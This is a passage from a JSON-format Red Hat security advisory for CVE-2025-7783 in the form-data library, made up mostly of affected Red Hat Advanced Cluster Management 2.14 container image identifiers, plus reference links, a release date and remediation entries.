"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-7783"
},
{
"category": "external",
"summary": "RHBZ#2381959",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2381959"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-7783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7783"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-7783",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7783"
},
{
"category": "external",
"summary": "https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0",
"url": "https://github.com/form-data/form-data/commit/3d1723080e6577a66f17f163ecd345a21d8d0fd0"
},
{
"category": "external",
"summary": "https://github.com/form-data/form-data/security/advisories/GHSA-fjxv-7rqg-78g4",
"url": "https://github.com/form-data/form-data/security/advisories/GHSA-fjxv-7rqg-78g4"
}
],
"release_date": "2025-07-18T16:34:44.889000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-30T12:58:23+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:19335"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
